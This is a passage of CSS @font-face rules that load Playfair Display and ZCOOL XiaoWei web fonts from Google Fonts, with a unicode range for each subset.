{font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgEM86xQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgEM86xQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgEM86xQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgEM86xQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.5.woff2) format(\'woff2\');unicode-range: U+fee3, U+fef3, U+ff03-ff04, U+ff07, U+ff0a, U+ff17-ff19, U+ff1c-ff1d, U+ff20-ff3a, U+ff3c, U+ff3e-ff5b, U+ff5d, U+ff61-ff65, U+ff67-ff6a, U+ff6c, U+ff6f-ff78, U+ff7a-ff7d, U+ff80-ff84, U+ff86, U+ff89-ff8e, U+ff92, U+ff97-ff9b, U+ff9d-ff9f, U+ffe0-ffe4, U+ffe6, U+ffe9, U+ffeb, U+ffed, U+fffc, U+1f004, U+1f170-1f171, U+1f192-1f195, U+1f198-1f19a, U+1f1e6-1f1e8;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.6.woff2) format(\'woff2\');unicode-range: U+f0a7, U+f0b2, U+f0b7, U+f0c9, U+f0d8, U+f0da, U+f0dc-f0dd, U+f0e0, U+f0e6, U+f0eb, U+f0fc, U+f101, U+f104-f105, U+f107, U+f10b, U+f11b, U+f14b, U+f18a, U+f193, U+f1d6-f1d7, U+f244, U+f27a, U+f296, U+f2ae, U+f471, U+f4b3, U+f610-f611, U+f880-f881, U+f8ec, U+f8f5, U+f8ff, U+f901, U+f90a, U+f92c-f92d, U+f934, U+f937, U+f941, U+f965, U+f967, U+f969, U+f96b, U+f96f, U+f974, U+f978-f979, U+f97e, U+f981, U+f98a, U+f98e, U+f997, U+f99c, U+f9b2, U+f9b5, U+f9ba, U+f9be, U+f9ca, U+f9d0-f9d1, U+f9dd, U+f9e0-f9e1, U+f9e4, U+f9f7, U+fa00-fa01, U+fa08, U+fa0a, U+fa11, U+fb01-fb02, U+fdfc, U+fe0e, U+fe30-fe31, U+fe33-fe44, U+fe49-fe52, U+fe54-fe57, U+fe59-fe66, U+fe68-fe6b, U+fe8e, U+fe92-fe93, U+feae, U+feb8, U+fecb-fecc, U+fee0;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.21.woff2) format(\'woff2\');unicode-range: U+9f83, U+9f85-9f8d, U+9f90-9f91, U+9f94-9f96, U+9f98, U+9f9b-9f9c, U+9f9e, U+9fa0, U+9fa2, U+9ff0-9fff, U+a001, U+a007, U+a025, U+a046-a047, U+a057, U+a072, U+a078-a079, U+a083, U+a085, U+a100, U+a118, U+a132, U+a134, U+a1f4, U+a242, U+a4a6, U+a4aa, U+a4b0-a4b1, U+a4b3, U+a9c1-a9c2, U+ac00-ac01, U+ac04, U+ac08, U+ac10-ac11, U+ac13-ac16, U+ac19, U+ac1c-ac1d, U+ac24, U+ac70-ac71, U+ac74, U+ac77-ac78, U+ac80-ac81, U+ac83, U+ac8c, U+ac90, U+ac9f-aca0, U+aca8-aca9, U+acac, U+acb0, U+acbd, U+acc1, U+acc4, U+ace0-ace1, U+ace4, U+ace8, U+acf3, U+acf5, U+acfc-acfd, U+ad00, U+ad0c, U+ad11, U+ad1c, U+ad34, U+ad50, U+ad64, U+ad6c, U+ad70, U+ad74, U+ad7f, U+ad81, U+ad8c, U+adc0, U+adc8, U+addc, U+ade0, U+adf8-adf9, U+adfc, U+ae00, U+ae08-ae09, U+ae0b, U+ae30, U+ae34, U+ae38, U+ae40, U+ae4a, U+ae4c, U+ae54, U+ae68, U+aebc, U+aed8, U+af2c-af2d;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.22.woff2) format(\'woff2\');unicode-range: U+9e30-9e33, U+9e35-9e3b, U+9e3e, U+9e40-9e44, U+9e46-9e4e, U+9e51, U+9e53, U+9e55-9e58, U+9e5a-9e5c, U+9e5e-9e63, U+9e66-9e6e, U+9e71, U+9e73, U+9e75, U+9e78-9e79, U+9e7c-9e7e, U+9e82, U+9e86-9e88, U+9e8b-9e8c, U+9e90-9e91, U+9e93, U+9e95, U+9e97, U+9e9d, U+9ea4-9ea5, U+9ea9-9eaa, U+9eb4-9eb5, U+9eb8-9eba, U+9ebc-9ebf, U+9ec3, U+9ec9, U+9ecd, U+9ed0, U+9ed2-9ed3, U+9ed5-9ed6, U+9ed9, U+9edc-9edd, U+9edf-9ee0, U+9ee2, U+9ee5, U+9ee7-9eea, U+9eef, U+9ef1, U+9ef3-9ef4, U+9ef6, U+9ef9, U+9efb-9efc, U+9efe, U+9f0b, U+9f0d, U+9f10, U+9f14, U+9f17, U+9f19, U+9f22, U+9f29, U+9f2c, U+9f2f, U+9f31, U+9f37, U+9f39, U+9f3d-9f3e, U+9f41, U+9f4a-9f4b, U+9f51-9f52, U+9f61-9f63, U+9f66-9f67, U+9f80-9f81;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.23.woff2) format(\'woff2\');unicode-range: U+9c82-9c83, U+9c85-9c8c, U+9c8e-9c92, U+9c94-9c9b, U+9c9e-9ca3, U+9ca5-9ca7, U+9ca9, U+9cab, U+9cad-9cae, U+9cb1-9cb7, U+9cb9-9cbd, U+9cbf-9cc0, U+9cc3, U+9cc5-9cc7, U+9cc9-9cd1, U+9cd3-9cda, U+9cdc-9cdd, U+9cdf, U+9ce1-9ce3, U+9ce5, U+9ce9, U+9cee-9cef, U+9cf3-9cf4, U+9cf6, U+9cfc-9cfd, U+9d02, U+9d08-9d09, U+9d12, U+9d1b, U+9d1e, U+9d26, U+9d28, U+9d37, U+9d3b, U+9d3f, U+9d51, U+9d59, U+9d5c-9d5d, U+9d5f-9d61, U+9d6c, U+9d70, U+9d72, U+9d7a, U+9d7e, U+9d84, U+9d89, U+9d8f, U+9d92, U+9daf, U+9db4, U+9db8, U+9dbc, U+9dc4, U+9dc7, U+9dc9, U+9dd7, U+9ddf, U+9df2, U+9df9-9dfa, U+9e0a, U+9e11, U+9e1a, U+9e1e, U+9e20, U+9e22, U+9e28-9e2c, U+9e2e-9e2f;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.24.woff2) format(\'woff2\');unicode-range: U+9a80, U+9a83, U+9a85, U+9a88-9a8a, U+9a8d-9a8e, U+9a90, U+9a92-9a93, U+9a95-9a96, U+9a98-9a99, U+9a9b-9aa2, U+9aa5, U+9aa7, U+9aaf-9ab1, U+9ab5-9ab6, U+9ab9-9aba, U+9ac0-9ac4, U+9ac8, U+9acb-9acc, U+9ace-9acf, U+9ad1-9ad2, U+9ad9, U+9adf, U+9ae1, U+9ae3, U+9aea-9aeb, U+9aed-9aef, U+9af4, U+9af9, U+9afb, U+9b03-9b04, U+9b06, U+9b08, U+9b0d, U+9b0f-9b10, U+9b13, U+9b18, U+9b1a, U+9b1f, U+9b22-9b23, U+9b25, U+9b27-9b28, U+9b2a, U+9b2f, U+9b31-9b32, U+9b3b, U+9b43, U+9b46-9b49, U+9b4d-9b4e, U+9b51, U+9b56, U+9b58, U+9b5a, U+9b5c, U+9b5f, U+9b61-9b62, U+9b6f, U+9b77, U+9b80, U+9b88, U+9b8b, U+9b8e, U+9b91, U+9b9f-9ba0, U+9ba8, U+9baa-9bab, U+9bad-9bae, U+9bb0-9bb1, U+9bb8, U+9bc9-9bca, U+9bd3, U+9bd6, U+9bdb, U+9be8, U+9bf0-9bf1, U+9c02, U+9c10, U+9c15, U+9c24, U+9c2d, U+9c32, U+9c39, U+9c3b, U+9c40, U+9c47-9c49, U+9c53, U+9c57, U+9c64, U+9c72, U+9c77-9c78, U+9c7b, U+9c7f-9c80;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.25.woff2) format(\'woff2\');unicode-range: U+98dd, U+98e1-98e2, U+98e7-98ea, U+98ec, U+98ee-98ef, U+98f2, U+98f4, U+98fc-98fe, U+9903, U+9905, U+9908, U+990a, U+990c-990d, U+9913-9914, U+9918, U+991a-991b, U+991e, U+9921, U+9928, U+992c, U+992e, U+9935, U+9938-9939, U+993d-993e, U+9945, U+994b-994c, U+9951-9952, U+9954-9955, U+9957, U+995e, U+9963, U+9966-9969, U+996b-996c, U+996f, U+9974-9975, U+9977-9979, U+997d-997e, U+9980-9981, U+9983-9984, U+9987, U+998a-998b, U+998d-9991, U+9993-9995, U+9997-9998, U+99a5, U+99ab, U+99ad-99ae, U+99b1, U+99b3-99b4, U+99bc, U+99bf, U+99c1, U+99c3-99c6, U+99cc, U+99d0, U+99d2, U+99d5, U+99db, U+99dd, U+99e1, U+99ed, U+99f1, U+99ff, U+9a01, U+9a03-9a04, U+9a0e-9a0f, U+9a11-9a13, U+9a19, U+9a1b, U+9a28, U+9a2b, U+9a30, U+9a32, U+9a37, U+9a40, U+9a45, U+9a4a, U+9a4d-9a4e, U+9a52, U+9a55, U+9a57, U+9a5a-9a5b, U+9a5f, U+9a62, U+9a65, U+9a69, U+9a6b, U+9a6e, U+9a75, U+9a77-9a7a, U+9a7d;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.26.woff2) format(\'woff2\');unicode-range: U+975b-975c, U+9763, U+9765-9766, U+976c-976d, U+9773, U+9776, U+977a, U+977c, U+9784-9785, U+978e-978f, U+9791-9792, U+9794-9795, U+9798, U+979a, U+979e, U+97a3, U+97a5-97a6, U+97a8, U+97ab-97ac, U+97ae-97af, U+97b2, U+97b4, U+97c6, U+97cb-97cc, U+97d3, U+97d8, U+97dc, U+97e1, U+97ea-97eb, U+97ee, U+97fb, U+97fe-97ff, U+9801-9803, U+9805-9806, U+9808, U+980c, U+9810-9814, U+9817-9818, U+981e, U+9820-9821, U+9824, U+9828, U+982b-982d, U+9830, U+9834, U+9838-9839, U+983c, U+9846, U+984d-984f, U+9851-9852, U+9854-9855, U+9857-9858, U+985a-985b, U+9862-9863, U+9865, U+9867, U+986b, U+986f-9871, U+9877-9878, U+987c, U+9880, U+9883, U+9885, U+9889, U+988b-988f, U+9893-9895, U+9899-989b, U+989e-989f, U+98a1-98a2, U+98a5-98a7, U+98a9, U+98af, U+98b1, U+98b6, U+98ba, U+98be, U+98c3-98c4, U+98c6-98c8, U+98cf-98d6, U+98da-98db;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.27.woff2) format(\'woff2\');unicode-range: U+95c4-95ca, U+95cc-95cd, U+95d4-95d6, U+95d8, U+95e1-95e2, U+95e9, U+95f0-95f1, U+95f3, U+95f6, U+95fc, U+95fe-95ff, U+9602-9604, U+9606-960d, U+960f, U+9611-9613, U+9615-9617, U+9619-961b, U+961d, U+9621, U+9628, U+962f, U+963c-963e, U+9641-9642, U+9649, U+9654, U+965b-965f, U+9661, U+9663, U+9665, U+9667-9668, U+966c, U+9670, U+9672-9674, U+9678, U+967a, U+967d, U+9682, U+9685, U+9688, U+968a, U+968d-968e, U+9695, U+9697-9698, U+969e, U+96a0, U+96a3-96a4, U+96a8, U+96aa, U+96b0-96b1, U+96b3-96b4, U+96b7-96b9, U+96bb-96bd, U+96c9, U+96cb, U+96ce, U+96d1-96d2, U+96d6, U+96d9, U+96db-96dc, U+96de, U+96e0, U+96e3, U+96e9, U+96eb, U+96f0-96f2, U+96f9, U+96ff, U+9701-9702, U+9705, U+9708, U+970a, U+970e-970f, U+9711, U+9719, U+9727, U+972a, U+972d, U+9730, U+973d, U+9742, U+9744, U+9748-9749, U+9750-9751, U+975a;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.28.woff2) format(\'woff2\');unicode-range: U+94f5, U+94f7, U+94f9, U+94fb-94fd, U+94ff, U+9503-9504, U+9506-9507, U+9509-950a, U+950d-950f, U+9511-9518, U+951a-9520, U+9522, U+9528-952d, U+9530-953a, U+953c-953f, U+9543-9546, U+9548-9550, U+9552-9555, U+9557-955b, U+955d-9568, U+956a-956d, U+9570-9574, U+9583, U+9586, U+9589, U+958e-958f, U+9591-9592, U+9594, U+9598-9599, U+959e-95a0, U+95a2-95a6, U+95a8-95b2, U+95b4, U+95b8-95c3;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.29.woff2) format(\'woff2\');unicode-range: U+941c-942b, U+942d-942e, U+9432-9433, U+9435, U+9438, U+943a, U+943e, U+9444, U+944a, U+9451-9452, U+945a, U+9462-9463, U+9465, U+9470-9487, U+948a-9492, U+9494-9498, U+949a, U+949c-949d, U+94a1, U+94a3-94a4, U+94a8, U+94aa-94ad, U+94af, U+94b2, U+94b4-94ba, U+94bc-94c0, U+94c4, U+94c6-94db, U+94de-94ec, U+94ee-94f1, U+94f3;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.30.woff2) format(\'woff2\');unicode-range: U+92ec-92ed, U+92f0, U+92f3, U+92f8, U+92fc, U+9304, U+9306, U+9310, U+9312, U+9315, U+9318, U+931a, U+931e, U+9320-9322, U+9324, U+9326-9329, U+932b-932c, U+932f, U+9331-9332, U+9335-9336, U+933e, U+9340-9341, U+934a-9360, U+9362-9363, U+9365-936b, U+936e, U+9375, U+937e, U+9382, U+938a, U+938c, U+938f, U+9393-9394, U+9396-9397, U+939a, U+93a2, U+93a7, U+93ac-93cd, U+93d0-93d1, U+93d6-93d8, U+93de-93df, U+93e1-93e2, U+93e4, U+93f8, U+93fb, U+93fd, U+940e-941a;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.31.woff2) format(\'woff2\');unicode-range: U+9163-9164, U+9169, U+9170, U+9172, U+9174, U+9179-917a, U+917d-917e, U+9182-9183, U+9185, U+918c-918d, U+9190-9191, U+919a, U+919c, U+91a1-91a4, U+91a8, U+91aa-91af, U+91b4-91b5, U+91b8, U+91ba, U+91be, U+91c0-91c1, U+91c6, U+91c8, U+91cb, U+91d0, U+91d2, U+91d7-91d8, U+91dd, U+91e3, U+91e6-91e7, U+91ed, U+91f0, U+91f5, U+91f9, U+9200, U+9205, U+9207-920a, U+920d-920e, U+9210, U+9214-9215, U+921c, U+921e, U+9221, U+9223-9227, U+9229-922a, U+922d, U+9234-9235, U+9237, U+9239-923a, U+923c-9240, U+9244-9246, U+9249, U+924e-924f, U+9251, U+9253, U+9257, U+925b, U+925e, U+9262, U+9264-9266, U+9268, U+926c, U+926f, U+9271, U+927b, U+927e, U+9280, U+9283, U+9285-928a, U+928e, U+9291, U+9293, U+9296, U+9298, U+929c-929d, U+92a8, U+92ab-92ae, U+92b3, U+92b6-92b7, U+92b9, U+92c1, U+92c5-92c6, U+92c8, U+92cc, U+92d0, U+92d2, U+92e4, U+92ea;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.32.woff2) format(\'woff2\');unicode-range: U+9004, U+900b, U+9011, U+9015-9016, U+901e, U+9021, U+9026, U+902d, U+902f, U+9031, U+9035-9036, U+9039-903a, U+9041, U+9044-9046, U+904a, U+904f-9052, U+9054-9055, U+9058-9059, U+905b-905e, U+9060-9062, U+9068-9069, U+906f, U+9072, U+9074, U+9076-907a, U+907c-907d, U+9081, U+9083, U+9085, U+9087-908b, U+908f, U+9095, U+9097, U+9099-909b, U+909d, U+90a0-90a1, U+90a8-90a9, U+90ac, U+90b0, U+90b2-90b4, U+90b6, U+90b8, U+90ba, U+90bd-90be, U+90c3-90c5, U+90c7-90c8, U+90cf-90d0, U+90d3, U+90d5, U+90d7, U+90da-90dc, U+90de, U+90e2, U+90e4, U+90e6-90e7, U+90ea-90eb, U+90ef, U+90f4-90f5, U+90f7, U+90fe-9100, U+9104, U+9109, U+910c, U+9112, U+9114-9115, U+9118, U+911c, U+911e, U+9120, U+9122-9123, U+9127, U+912d, U+912f-9132, U+9139-913a, U+9143, U+9146, U+9149-914a, U+914c, U+914e-9150, U+9154, U+9157, U+915a, U+915d-915e, U+9161-9162;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.33.woff2) format(\'woff2\');unicode-range: U+8e41-8e42, U+8e47, U+8e49-8e4b, U+8e50-8e53, U+8e59-8e5a, U+8e5f-8e60, U+8e64, U+8e69, U+8e6c, U+8e70, U+8e74, U+8e76, U+8e7a-8e7c, U+8e7f, U+8e84-8e85, U+8e87, U+8e89, U+8e8b, U+8e8d, U+8e8f-8e90, U+8e94, U+8e99, U+8e9c, U+8e9e, U+8eaa, U+8eac, U+8eb0, U+8eb6, U+8ec0, U+8ec6, U+8eca-8ece, U+8ed2, U+8eda, U+8edf, U+8ee2, U+8eeb, U+8ef8, U+8efb-8efe, U+8f03, U+8f09, U+8f0b, U+8f12-8f15, U+8f1b, U+8f1d, U+8f1f, U+8f29-8f2a, U+8f2f, U+8f36, U+8f38, U+8f3b, U+8f3e-8f3f, U+8f44-8f45, U+8f49, U+8f4d-8f4e, U+8f5f, U+8f6b, U+8f6d, U+8f71-8f73, U+8f75-8f76, U+8f78-8f7a, U+8f7c, U+8f7e, U+8f81-8f82, U+8f84, U+8f87, U+8f8a-8f8b, U+8f8d-8f8f, U+8f94-8f95, U+8f97-8f9a, U+8fa6, U+8fad-8faf, U+8fb2, U+8fb5-8fb7, U+8fba-8fbc, U+8fbf, U+8fc2, U+8fcb, U+8fcd, U+8fd3, U+8fd5, U+8fd7, U+8fda, U+8fe2-8fe5, U+8fe8-8fe9, U+8fee, U+8ff3-8ff4, U+8ff8, U+8ffa;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFeQGQyULWqNeaO2wdeeLndSssJBUqlpCLNQMZe1xLAW-ZS4pgw.34.woff2) format(\'woff2\');unicode-range: U+8cbd, U+8cbf-8cc4, U+8cc7-8cc8, U+8cca, U+8ccd, U+8cd1, U+8cd3, U+8cdb-8cdc, U+8cde, U+8ce0, U+8ce2-8ce4, U+8ce6-8ce8, U+8cea, U+8ced, U+8cf4, U+8cf8, U+8cfa, U+8cfc-8cfd, U+8d04-8d05, U+8d07-8d08, U+8d0a, U+8d0d, U+8d0f, U+8d13-8d14, U+8d16, U+8d1b, U+8d20, U+8d30, U+8d32-8d33, U+8d36, U+8d3b, U+8d3d, U+8d40, U+8d42-8d43, U+8d45-8d46, U+8d48-8d4a, U+8d4d, U+8d51, U+8d53, U+8d55, U+8d59, U+8d5c-8d5d, U+8d5f, U+8d61, U+8d66-8d67, U+8d6a, U+8d6d, U+8d71, U+8d73, U+8d84, U+8d90-8d91, U+8d94-8d95, U+8d99, U+8da8, U+8daf, U+8db1, U+8db5, U+8db8, U+8dba, U+8dbc, U+8dbf, U+8dc2, U+8dc4, U+8dc6, U+8dcb, U+8dce-8dcf, U+8dd6-8dd7, U+8dda-8ddb, U+8dde, U+8de1, U+8de3-8de4, U+8de9, U+8deb-8dec, U+8df0-8df1, U+8df6-8dfd, U+8e05, U+8e07, U+8e09-8e0a, U+8e0c, U+8e0e, U+8e10, U+8e14, U+8e1d-8e1f, U+8e23, U+8e26, U+8e2b-8e31, U+8e34-8e35, U+8e39-8e3a, U+8e3d, U+8e40;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: 